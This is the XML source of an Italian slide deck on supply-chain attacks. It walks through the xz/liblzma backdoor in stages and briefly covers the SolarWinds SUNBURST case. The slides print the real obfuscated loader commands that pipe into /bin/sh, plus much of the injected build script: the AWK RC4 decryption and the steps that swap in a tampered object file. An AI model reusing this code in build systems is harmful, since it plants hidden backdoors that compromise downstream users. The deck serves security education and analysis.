            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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 &amp;&amp; head -c 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+939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)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(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-dc $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tests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/files/good-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large_compressed.lzma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$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i|tail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-c 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+31233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tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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"\0-\377"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-F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raw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--lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####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1553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67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7018"/>
            <a:ext cx="11864247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Stage 1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Il binario risultante dalla precedente operazione viene decompresso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Da qui si ottiene un file molto lungo che Andres Freund allega alla mailing list col nome di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Nelle prossime slide ci sono degli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snippet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  <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Successivamente, quest'ultimo file viene eseguito con Shell.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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="1197941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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/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 &amp;&amp; head -c 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+939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)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(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-dc $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tests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/files/good-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large_compressed.lzma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$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i|tail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-c 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+31233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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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 "\0-\377")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| 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xz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-F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="10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raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="10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 --lzma1 -dc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####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502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68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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107706" y="1717293"/>
            <a:ext cx="11979411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600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>1 P="-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fPIC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-DPIC -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fno-lto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-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ffunction-sections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-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fdata-sections"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2 C="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pic_flag=\" $P\""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3 O="^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pic_flag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=\" -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fPIC -DPIC\"$"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4 R="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is_arch_extension_supported"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5 x="__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get_cpuid("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6 p="good-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large_compressed.lzma"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7 U="bad-3-corrupt_lzma2.xz"
8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$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zrKcVq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9 if test -f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config.status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;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then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10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$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zrKcSS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11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^LD=\'\/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12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^CC=\'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13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^GCC=\'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14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^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=\'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15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^build=\'x86_64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16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^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enable_shared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=\'yes\'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17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^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enable_static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=\'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18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`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^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gl_path_map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=\'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config.status`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19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eval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$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zrKccj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20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if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!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-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qs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'\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"'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config.status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&gt; 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dev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null 2&gt;&amp;1;then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
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21 exit 0
22 fi
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23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if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!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-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qs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'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define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HAVE_FUNC_ATTRIBUTE_IFUNC 1'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config.h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&gt; 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dev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null 2&gt;&amp;1;then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
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24 exit 0
25 fi
26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if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test "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x$enable_shared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" != "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xyes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";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then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27 exit 0
28 fi
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29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if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! (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echo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"$build" |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-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Eq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"^x86_64" &gt; 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dev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null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2&gt;&amp;1) &amp;&amp; (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echo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"$build" |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-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Eq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"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linux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-gnu$" &gt; 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dev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null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 2&gt;&amp;1);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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then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30 exit 0
31 fi
32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if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!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-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qs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"$R()" $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src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liblzma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/check/crc64_fast.c &gt; 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2&gt;&amp;1;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then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33 exit 0
34 fi
35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if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!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-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qs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"$R()" $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src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liblzma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/check/crc32_fast.c &gt; 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2&gt;&amp;1;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then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36 exit 0
37 fi
38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if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!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-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qs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"$R" $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src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liblzma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/check/crc_x86_clmul.h &gt; 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2&gt;&amp;1;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then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39 exit 0
40 fi
41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if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!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grep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-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qs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"$x" $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srcdir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src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liblzma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/check/crc_x86_clmul.h &gt; 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null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2&gt;&amp;1;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then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42 exit 0
43 fi
44 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if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 test "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x$GCC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" != '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xyes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' &gt; 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dev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Consolas"/>
              </a:rPr>
              <a:t>null 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
45 exit 0
46 fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1050">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="6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DDAF615-7963-DA9A-D59C-90A084ED2BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655879" y="1786758"/>
            <a:ext cx="583543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47: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test "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x$CC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!= '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xgcc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'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48: exit 0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49: fi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50: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LDv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=$LD" -v"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51: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LDv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 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'GNU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'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52: exit 0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53: fi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54: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test -f "$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tests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/files/$p"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55: exit 0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56: fi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57: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test -f "$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tests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/files/$U"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58: exit 0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59: fi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60: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test -f "$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debian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/rules" || test "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x$RPM_ARCH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= "xx86_64";then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61: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eval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zrKcst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62: j="^ACLOCAL_M4 = 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)\/aclocal.m4"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63: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"$j"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64: exit 0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65: fi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66: z="^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uninstall_files_from_dir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= {"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67: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"$z"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68: exit 0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69: fi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70: w="^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install_max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="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71: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"$w"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72: exit 0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73: fi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74: E=$z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75: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"$E"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76: exit 0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77: fi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78: Q="^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vpath_adj_setup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="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79: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"$Q"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80: exit 0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81: fi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82: M="^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__include = include"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83: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"$M"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84: exit 0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85: fi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86: L="^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-recursive$"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87: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"$L"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88: exit 0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89: fi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90: m="^LTLIBRARIES = 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lib_LTLIBRARIES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)"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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91: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"$m"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 sz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8228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69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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107706" y="1564893"/>
            <a:ext cx="11979411" cy="49859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92: exit 0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93: fi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94: u="AM_V_CCLD = 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v_CCLD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_\$(V))"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95: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"$u"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96: exit 0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97: fi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98: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"$O"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libtool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99: exit 0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100: fi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101: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eval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zrKcTy</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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102: b="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__test = $U"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103: sed -i "/$j/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i$b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true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104: d=`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echo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gl_path_map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 sed 's/\\\/\\\\\\\\/g'`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105: b="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strip_prefix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= $d"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106: sed -i "/$w/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i$b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"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||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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107: b="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dist_setup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= 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strip_prefix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 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xz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-d 2&gt;/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 \$(SHELL)"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108: sed -i "/$E/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i$b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true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109: b="\$(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tests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/files/\$(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__test)"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110: s="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test_dir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=$b"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111: sed -i "/$Q/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i$s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true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112: h="-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Wl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,--sort-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section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=name,-X"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113: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echo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"$LDFLAGS" |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-e "-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z,now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" -e "-z -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Wl,now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" &gt; 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2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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114: h=$h",-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z,now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115: fi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116: j="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liblzma_la_LDFLAGS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+= $h"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117: sed -i "/$L/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i$j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true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118: sed -i "s/$O/$C/g"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libtool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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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119: k="AM_V_CCLD = @echo -n \$(LTDEPS); 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v_CCLD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_\$(V))"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120: sed -i "s/$u/$k/"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true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121: l="LTDEPS='\$(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lib_LTDEPS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122: export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='\$(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123: export CC='\$(CC)';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124: export DEFS='\$(DEFS)';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125: export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)';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/>
              </a:rPr>
              <a:t>\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3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126: export INCLUDES='\$(INCLUDES)';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/>
              </a:rPr>
              <a:t>\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3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127: export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liblzma_la_CPPFLAGS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='\$(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liblzma_la_CPPFLAGS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128: export CPPFLAGS='\$(CPPFLAGS)';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129: export AM_CFLAGS='\$(AM_CFLAGS)';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130: export CFLAGS='\$(CFLAGS)';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/>
              </a:rPr>
              <a:t>\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3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131: export AM_V_CCLD='\$(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v_CCLD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_\$(V))';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132: export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liblzma_la_LINK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='\$(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liblzma_la_LINK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133: export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='\$(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134: export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liblzma_la_OBJECTS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='\$(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liblzma_la_OBJECTS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135: export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liblzma_la_LIBADD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='\$(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liblzma_la_LIBADD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)';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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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136: sed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rpath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test_dir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 | \$(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am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dist_setup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 &gt;/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2&gt;&amp;1";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137: sed -i "/$m/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i$l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Makefile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true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138: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eval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zrKcHD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139: fi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140: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elif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(test -f .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/liblzma_la-crc64_fast.o) &amp;&amp; (test -f .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/liblzma_la-crc32_fast.o);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then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141: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eval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zrKcKQ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142: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"$R()"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/check/crc64_fast.c;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then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143: exit 0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144: fi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DDAF615-7963-DA9A-D59C-90A084ED2BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5586577" y="1567683"/>
            <a:ext cx="5914257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145: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"$R()"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/check/crc32_fast.c;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then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146: exit 0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147: fi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148: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"$R"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/check/crc_x86_clmul.h;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err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149: exit 0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150: fi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151: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"$x"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/check/crc_x86_clmul.h;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err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152: exit 0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153: fi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154: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"$C" ../../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libtool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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err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155: exit 0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156: fi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157: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echo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liblzma_la_LINK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-e "-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z,now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-e "-z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Wl,now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158: exit 0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159: fi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160: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echo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liblzma_la_LINK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qs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-e "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lazy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&gt; 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2&gt;&amp;1;then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161: exit 0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162: fi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163: N=0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164: W=0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165: Y=`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grep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"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dnl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Convert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it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to C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string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syntax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."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/m4/gettext.m4`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166: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eval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zrKcjv</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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167: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test -z "$Y";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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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168: N=0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169: W=88792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170: else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171: N=88792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172: W=0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173: fi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174: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xz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-dc $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tests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/files/$p |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eval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$i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C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awk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'BEGIN{FS="\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n";RS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="\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n";ORS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="";m=256;for(i=0;i&lt;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m;i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++){t[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sprintf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("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x%c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",i)]=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i;c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[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l&lt;4096;l++){i=(i+1)%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m;a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=c[i];j=(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j+a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)%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m;c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[i]=c[j];c[j]=a;}}{v=t["x" (NF&lt;1?RS:$1)];i=(i+1)%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m;a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=c[i];j=(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j+a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)%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m;b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=c[j];c[i]=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b;c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[j]=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a;k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=c[(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a+b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)%m];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printf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"%c",(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v+k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)%m}' |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xz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-dc --single-stream | ((head -c +$N &gt; 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 2&gt;&amp;1) &amp;&amp; head -c +$W) &gt; liblzma_la-crc64-fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="60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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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175: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! test -f liblzma_la-crc64-fast.o;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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176: exit 0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177: fi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178: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cp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.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/liblzma_la-crc64_fast.o .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/liblzma_la-crc64-fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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179: V='#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endif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\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n#if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defined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(CRC32_GENERIC) &amp;&amp;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defined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(CRC64_GENERIC) &amp;&amp;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defined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(CRC_X86_CLMUL) &amp;&amp;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defined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(CRC_USE_IFUNC) &amp;&amp;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defined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(PIC) &amp;&amp; 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defined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(BUILDING_CRC64_CLMUL) ||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defined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(BUILDING_CRC32_CLMUL))\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nextern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int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get_cpuid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int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void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*,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void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*,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void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*,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void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*,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void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*);\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nstatic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inline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bool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is_arch_extension_supported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void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 {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int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success = 1; uint32_t r[4]; success = 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get_cpuid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(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((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char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*) __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builtin_frame_address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(0))-16);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const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uint32_t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ecx_mask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= (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19);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return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success &amp;&amp; (r[2] &amp;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ecx_mask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) ==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ecx_mask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; }\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n#else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\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n#define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is_arch_extension_supported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is_arch_extension_supported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'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180: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eval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yosA</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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181: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sed "/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return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is_arch_extension_supported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()/ c\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return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is_arch_extension_supported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()"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/check/crc64_fast.c | \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182: sed "/include \"crc_x86_clmul.h\"/a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\\$V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| \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183: sed "1i # 0 \"$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/check/crc64_fast.c\"" 2&gt;/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 \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184: $CC $DEFS $DEFAULT_INCLUDES $INCLUDES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liblzma_la_CPPFLAGS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$CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .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/liblzma_la-crc64_fast.o 2&gt;/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;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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185: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cp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.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/liblzma_la-crc32_fast.o .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libs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/liblzma_la-crc32-fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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186: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eval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BPep</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1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187: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sed "/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return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is_arch_extension_supported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()/ c\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return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_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is_arch_extension_supported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()" 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/check/crc32_fast.c | \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188: sed "/include \"crc32_arm64.h\"/a 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\\$V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" | \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189: sed "1i # 0 \"$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top_srcdir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src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/check/crc32_fast.c\"" 2&gt;/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dev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it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | \</a:t>
            </a:r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87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12832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Introduzione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73743" y="1849693"/>
            <a:ext cx="12115185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Esempio: </a:t>
            </a:r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caso SUNBURST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è una compagnia americana che ha come core business i tool di monitoraggio reti ed infrastrutture. Il suo software di picco è Orion, un IT performance monitor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per funzionare, tale software accede in maniera privilegiata ai dati di log delle aziende.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Gli hacker accedono a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> grazie ai dati di un precedente data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Iniezione di una libreria .dll con backdoor, chiamata SUNBURST, nel sistema Orion;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Update con SUNBURST verso i clienti di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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Gli hacker accedono ai dati dei customers ed eseguono RCE nelle aziende clienti.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pPr>
              <a:buFont typeface="Arial"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L'operazione è stata condotta per 2 anni (2019-2020) dal gruppo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nobelium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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37785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70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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107706" y="1717293"/>
            <a:ext cx="11979411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190: $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $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liblzma_la_CPPFLAGS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$CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c -  $P -o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/liblzma_la-crc32_fast.o;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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191: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eval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$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RgYB</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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192: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if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$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AM_V_CCLD$liblzma_la_LINK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-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rpath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$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libdir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$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liblzma_la_OBJECTS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$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liblzma_la_LIBADD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;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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193: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if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test ! -f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/liblzma.so;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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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194: mv -f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/liblzma_la-crc32-fast.o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/liblzma_la-crc32_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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195: mv -f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/liblzma_la-crc64-fast.o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/liblzma_la-crc64_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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196: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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197: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rm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-fr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liblzma.a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liblzma.la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liblzma.lai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/liblzma.so* ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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198: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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199: mv -f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/liblzma_la-crc32-fast.o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/liblzma_la-crc32_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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200: mv -f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/liblzma_la-crc64-fast.o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/liblzma_la-crc64_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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201: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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202: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rm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-f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/liblzma_la-crc32-fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1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203: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rm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-f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/liblzma_la-crc64-fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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204: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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205: mv -f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/liblzma_la-crc32-fast.o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/liblzma_la-crc32_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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206: mv -f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/liblzma_la-crc64-fast.o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/liblzma_la-crc64_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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207: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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208: else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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209: mv -f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/liblzma_la-crc64-fast.o .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libs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/liblzma_la-crc64_fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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210: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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211: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rm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-f liblzma_la-crc64-fast.o ||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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600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212: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p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213: 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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="60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 $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err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DHLd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz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7874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71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7662"/>
            <a:ext cx="41840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Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10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EC5E5C30-5C51-0CE0-68BD-6FE925C27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446" y="1457633"/>
            <a:ext cx="6929141" cy="5270090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B37BA449-1C67-CE05-B4D0-F42FE7E2498C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661478" y="5336760"/>
            <a:ext cx="1258956" cy="4306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arentesi graffa aperta 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D45759-2F6B-4D38-3014-13950D1E2518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="4734890"/>
            <a:ext cx="463823" cy="16454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7305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72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6415"/>
            <a:ext cx="11853204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Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Il programma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infected.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> viene eseguito per modificare il processo di compilazione.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C'è ancora un certo grado di offuscamento. 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Sembra ci siano anche script di crittografia RC4 scritti in AWK. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
